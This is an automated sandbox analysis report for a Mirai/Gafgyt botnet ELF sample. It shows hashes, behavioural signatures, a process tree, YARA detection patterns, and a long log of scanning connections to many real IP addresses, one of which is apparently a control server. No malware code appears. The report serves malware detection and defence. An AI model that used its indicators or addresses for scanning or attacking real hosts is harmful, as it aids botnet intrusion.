Loading ...

Play interactive tourEdit tour

Linux Analysis Report SLdtSSVlj2

Overview

General Information

Sample Name:SLdtSSVlj2
Analysis ID:553479
MD5:6b355f508658f7fbe9c91fad5d09d6b5
SHA1:72a9d43e568016e0384a39e391391498695328bd
SHA256:9010857d2724b141fc1ccc742e9d5d41ff50e102878d196fd9726458b0864c19
Tags:32elfmiraisparc
Infos:

Detection

Gafgyt Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Malicious sample detected (through community Yara rule)
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Yara signature match
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Creates hidden files and/or directories
Sample has stripped symbol table

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:553479
Start date:15.01.2022
Start time:00:44:21
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 43s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:SLdtSSVlj2
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.lin@0/4@0/0
Warnings:
Show All
  • Connection to analysis system has been lost, crash info: Unknown

Process Tree

  • system is lnxubuntu20
  • SLdtSSVlj2 (PID: 5267, Parent: 5104, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/SLdtSSVlj2
  • systemd New Fork (PID: 5288, Parent: 1)
  • journalctl (PID: 5288, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5309, Parent: 1)
  • dbus-daemon (PID: 5309, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5321, Parent: 1)
  • whoopsie (PID: 5321, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5322, Parent: 1860)
  • pulseaudio (PID: 5322, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5323, Parent: 1)
  • rsyslogd (PID: 5323, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • fusermount (PID: 5324, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5325, Parent: 1)
  • systemd-journald (PID: 5325, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5326, Parent: 1334)
  • pulseaudio (PID: 5326, Parent: 1334, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5337, Parent: 1)
  • rtkit-daemon (PID: 5337, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5340, Parent: 1)
  • systemd-logind (PID: 5340, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 5398, Parent: 1320)
  • Default (PID: 5398, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5399, Parent: 1)
  • dbus-daemon (PID: 5399, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • gdm3 New Fork (PID: 5400, Parent: 1320)
  • Default (PID: 5400, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5401, Parent: 1)
  • systemd-journald (PID: 5401, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5402, Parent: 1)
  • whoopsie (PID: 5402, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5403, Parent: 1)
  • rsyslogd (PID: 5403, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5404, Parent: 1334)
  • pulseaudio (PID: 5404, Parent: 1334, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5407, Parent: 1)
  • systemd-logind (PID: 5407, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 5464, Parent: 1320)
  • Default (PID: 5464, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5465, Parent: 1)
  • dbus-daemon (PID: 5465, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5466, Parent: 1)
  • systemd-journald (PID: 5466, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5491, Parent: 1)
  • dbus-daemon (PID: 5491, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5496, Parent: 1)
  • whoopsie (PID: 5496, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5501, Parent: 1)
  • rsyslogd (PID: 5501, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5523, Parent: 1334)
  • pulseaudio (PID: 5523, Parent: 1334, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5527, Parent: 1)
  • dbus-daemon (PID: 5527, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5538, Parent: 1)
  • systemd-journald (PID: 5538, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5592, Parent: 1)
  • whoopsie (PID: 5592, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5595, Parent: 1)
  • rsyslogd (PID: 5595, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5599, Parent: 1)
  • rsyslogd (PID: 5599, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5600, Parent: 1)
  • whoopsie (PID: 5600, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5602, Parent: 1)
  • gpu-manager (PID: 5602, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • systemd New Fork (PID: 5603, Parent: 1)
  • generate-config (PID: 5603, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
  • systemd New Fork (PID: 5604, Parent: 1)
  • gpu-manager (PID: 5604, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • systemd New Fork (PID: 5605, Parent: 1)
  • generate-config (PID: 5605, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
  • systemd New Fork (PID: 5606, Parent: 1)
  • gpu-manager (PID: 5606, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • systemd New Fork (PID: 5607, Parent: 1)
  • generate-config (PID: 5607, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
  • systemd New Fork (PID: 5608, Parent: 1)
  • systemd New Fork (PID: 5609, Parent: 1)
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SLdtSSVlj2SUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x14908:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14978:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x149e8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14a58:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14ac8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14d38:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14d90:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14de8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14e40:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14e98:$xo1: oMXKNNC\x0D\x17\x0C\x12
SLdtSSVlj2Mirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
  • 0x12c68:$x1: POST /cdn-cgi/
  • 0x14768:$s1: LCOGQGPTGP
  • 0x14280:$s4: QWRGPTKQMP
SLdtSSVlj2MAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
  • 0x12c68:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
SLdtSSVlj2JoeSecurity_Mirai_5Yara detected MiraiJoe Security
    SLdtSSVlj2JoeSecurity_Mirai_8Yara detected MiraiJoe Security
      Click to see the 2 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      5275.1.000000002ac99f32.000000004dded084.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
      • 0x554:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x5c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x63c:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x6b0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x724:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x9a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x9f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xa50:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xaa8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xb00:$xo1: oMXKNNC\x0D\x17\x0C\x12
      5276.1.000000002ac99f32.000000004dded084.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
      • 0x554:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x5c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x63c:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x6b0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x724:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x9a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x9f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xa50:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xaa8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xb00:$xo1: oMXKNNC\x0D\x17\x0C\x12
      5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
      • 0x14908:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14978:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x149e8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14a58:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14ac8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14d38:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14d90:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14de8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14e40:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14e98:$xo1: oMXKNNC\x0D\x17\x0C\x12
      5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmpMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
      • 0x12c68:$x1: POST /cdn-cgi/
      • 0x14768:$s1: LCOGQGPTGP
      • 0x14280:$s4: QWRGPTKQMP
      5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
      • 0x12c68:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
      Click to see the 51 entries

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: SLdtSSVlj2Virustotal: Detection: 53%Perma Link
      Source: SLdtSSVlj2ReversingLabs: Detection: 62%

      Networking:

      barindex
      Connects to many ports of the same IP (likely port scanning)Show sources
      Source: global trafficTCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
      Uses known network protocols on non-standard portsShow sources
      Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 60001
      Source: unknownNetwork traffic detected: HTTP traffic on port 60001 -> 49312
      Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
      Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
      Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 59.56.176.218:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 42.72.218.69:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 137.130.224.50:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 2.152.239.194:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 82.28.36.35:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 95.92.170.188:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 70.10.33.63:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 185.35.40.190:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 54.87.128.116:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 166.3.148.104:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 220.81.214.84:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 178.234.197.231:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 211.166.98.72:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 147.78.208.7:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 201.142.224.189:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 191.95.69.87:2323
      Source: global trafficTCP traffic: 192.168.2.23:48182 -> 104.244.72.234:64938
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.250.128.218:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 131.201.241.218:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 179.38.178.37:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 65.207.231.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 144.136.34.215:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 57.205.199.200:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 193.116.192.178:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 2.253.77.90:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 41.2.78.106:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 150.49.15.206:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 46.5.63.15:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 186.124.39.177:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 60.170.213.212:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 137.223.230.40:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.66.84.84:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 167.78.97.43:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 43.160.110.215:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 102.58.149.163:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 119.77.144.40:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 153.228.38.115:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 211.49.207.162:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 220.101.127.64:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 142.214.72.142:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 35.123.66.253:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 183.73.6.130:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 70.32.78.173:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 85.180.43.201:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.1.119.150:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 183.47.166.215:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.150.76.241:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 190.28.192.137:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 47.1.232.88:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 206.192.117.229:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 18.44.113.87:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 37.237.120.202:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 146.96.60.183:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 155.199.2.182:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 13.91.137.101:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 162.217.84.106:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 115.11.61.201:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.229.231.82:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 2.132.53.104:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 58.197.90.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 36.240.95.197:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 132.85.182.1:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 45.109.254.21:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 217.208.101.141:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.173.178.107:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 158.202.74.167:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 184.113.61.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 114.18.178.25:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 115.121.140.189:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 25.34.91.246:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 171.204.233.160:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 94.77.33.169:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 25.237.100.108:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 95.39.9.6:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 180.100.151.116:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 200.173.78.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 42.172.34.138:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 186.218.59.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 208.96.112.226:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 177.254.31.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.243.113.152:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 220.202.74.14:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.169.143.232:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 91.141.67.200:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 176.6.253.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.250.246.203:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 13.43.173.1:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.50.22.6:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 118.71.161.8:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 141.108.214.169:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 174.24.236.178:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.26.218.182:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 40.125.44.53:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 155.101.124.136:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 203.116.207.247:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 193.133.17.192:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.117.69.224:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 155.227.125.37:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 149.196.12.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.36.36.74:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 101.140.137.48:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 107.163.250.253:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 175.255.163.44:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 139.83.212.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 38.78.129.160:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 86.135.147.183:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 133.54.125.45:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 19.42.77.176:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.176.140.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 180.241.210.253:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 150.160.31.189:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 51.65.62.81:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 46.38.62.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 118.175.215.86:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 45.4.148.150:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.117.26.98:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.228.57.188:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 130.116.254.234:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 144.0.186.41:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 108.67.30.19:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 129.66.107.52:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 87.42.15.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 221.233.77.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 145.157.214.218:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 111.28.16.160:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 81.138.248.26:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 149.179.68.242:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 113.192.207.250:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 165.155.226.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 170.236.84.50:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 9.26.139.61:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.92.199.12:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 12.87.141.173:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 193.189.142.28:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.163.128.67:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 141.204.113.153:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 191.236.99.150:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 80.40.174.76:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 201.201.99.208:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.76.246.98:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 68.231.95.103:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 121.233.243.238:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 87.14.231.72:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 201.25.71.174:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 183.155.240.64:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 194.97.121.109:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 170.25.63.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 48.135.200.202:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 178.67.149.155:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 191.7.143.64:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 131.250.249.2:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 65.236.217.146:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 120.231.196.220:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 200.250.73.7:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 64.89.168.209:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 94.215.22.60:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 134.59.35.21:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 216.64.220.225:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 220.167.173.220:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 201.138.128.79:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 25.208.182.171:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 186.162.227.134:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 220.89.118.8:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 200.77.77.175:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 184.151.198.189:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 218.114.49.85:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 168.244.238.165:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 135.12.53.219:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 183.185.247.91:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 153.226.177.189:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 185.85.206.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 2.153.116.82:60001
